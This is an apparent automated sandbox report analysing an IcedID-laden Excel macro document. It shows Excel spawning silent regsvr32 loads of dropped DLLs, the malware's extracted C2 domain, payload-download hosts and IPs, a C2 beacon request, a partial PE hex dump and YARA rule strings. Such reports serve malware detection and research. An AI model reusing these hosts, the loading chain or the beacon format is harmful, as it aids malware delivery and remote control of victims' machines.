Play interactive tour

Edit tour

Windows Analysis Report uhr908723097306.xlsm

Overview

General Information

Sample Name:	uhr908723097306.xlsm
Analysis ID:	444736
MD5:	e61d872e6bd0ba19d435dae638168034
SHA1:	939842aa615def586067f03e12fefbc0f6952d57
SHA256:	00c91b1844e31811f8a2ebd9047cc093a955437c700844f7a72bd6d54b73c602
Tags:	IcedIDxlsm
Infos:
Most interesting Screenshot:

Detection

IcedID

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected IcedID

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Tries to detect virtualization through RDTSC time measurements

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query network adapater information

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Excel documents contains an embedded macro which executes code when the document is opened

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains an invalid checksum

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Registers a DLL

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2576 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

regsvr32.exe (PID: 2824 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2836 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2992 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)

cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security
00000004.00000002.2086927834.0000000000190000.00000004.00000001.sdmp	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x27c6:$internal_name: loader_dll_64.dll 0x30b4:$string0: _gat= 0x3114:$string1: _ga= 0x30ec:$string2: _gid= 0x30cc:$string3: _u= 0x3026:$string4: _io= 0x30d8:$string5: GetAdaptersInfo 0x2b16:$string6: WINHTTP.dll 0x27ea:$string7: DllRegisterServer 0x27fc:$string8: PluginInit 0x3080:$string9: POST 0x3140:$string10: aws.amazon.com
00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security
Process Memory Space: regsvr32.exe PID: 2836	JoeSecurity_IcedID_1	Yara detected IcedID	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.regsvr32.exe.2100000.4.unpack	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x27c6:$internal_name: loader_dll_64.dll 0x30bc:$string0: _gat= 0x311c:$string1: _ga= 0x30f4:$string2: _gid= 0x30d4:$string3: _u= 0x302e:$string4: _io= 0x30e0:$string5: GetAdaptersInfo 0x2b16:$string6: WINHTTP.dll 0x27ea:$string7: DllRegisterServer 0x27fc:$string8: PluginInit 0x3088:$string9: POST 0x3148:$string10: aws.amazon.com
4.2.regsvr32.exe.190000.0.unpack	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x1bc6:$internal_name: loader_dll_64.dll 0x1f16:$string6: WINHTTP.dll 0x1bea:$string7: DllRegisterServer 0x1bfc:$string8: PluginInit
4.2.regsvr32.exe.190000.0.raw.unpack	MAL_IcedID_GZIP_LDR_202104	2021 initial Bokbot / Icedid loader for fake GZIP payloads	Thomas Barabosch, Telekom Security	0x27c6:$internal_name: loader_dll_64.dll 0x30b4:$string0: _gat= 0x3114:$string1: _ga= 0x30ec:$string2: _gid= 0x30cc:$string3: _u= 0x3026:$string4: _io= 0x30d8:$string5: GetAdaptersInfo 0x2b16:$string6: WINHTTP.dll 0x27ea:$string7: DllRegisterServer 0x27fc:$string8: PluginInit 0x3080:$string9: POST 0x3140:$string10: aws.amazon.com

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2576, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 2824

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.regsvr32.exe.2100000.4.unpack

Malware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2836, type: MEMORY

Source: unknown

HTTPS traffic detected: 143.204.91.74:443 -> 192.168.2.22:49170 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\XTOWN.dll

Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: lsdfik[1].fml.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Source: global traffic

DNS query: name: thousandsyears.download

Source: global traffic

TCP traffic: 192.168.2.22:49170 -> 143.204.91.74:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.67.198.51:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: astrocycle.download

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 14:11:22 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 890Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=risMmPhYq3wJrZz3k9%2B14IWDNOTX2c3xVZeTWQ8vfS%2F1tYGToTa1Zpy%2BtPFdIEr%2BzGkKsBVqMbjWiw3k5uTVECdcd%2Bf04gzug%2FduYbWecaOL8G%2BwShwaiRtJCg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a96c01eedb2c22-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:6826:48; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=333737313432:416C627573:37443741304539443043413546423346; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download

Source: Joe Sandbox View	IP Address: 172.67.198.51 172.67.198.51
Source: Joe Sandbox View	IP Address: 143.204.91.74 143.204.91.74
Source: Joe Sandbox View	IP Address: 104.21.55.83 104.21.55.83

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 143.204.91.74:443 -> 192.168.2.22:49170 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56B30D73.png

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:6826:48; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=333737313432:416C627573:37443741304539443043413546423346; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download

Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
Source: regsvr32.exe, 00000004.00000002.2089523465.00000000031E0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: X-Amz-Cf-IdbLmDZatXQQeybzve3ALO7rMrYkwAq29nLpG4wTn_hOdZHwkRn6hkjw==X-Amz-Cf-PopFRA50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: X-Amz-Cf-IdbLmDZatXQQeybzve3ALO7rMrYkwAq29nLpG4wTn_hOdZHwkRn6hkjw==X-Amz-Cf-PopFRA50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com 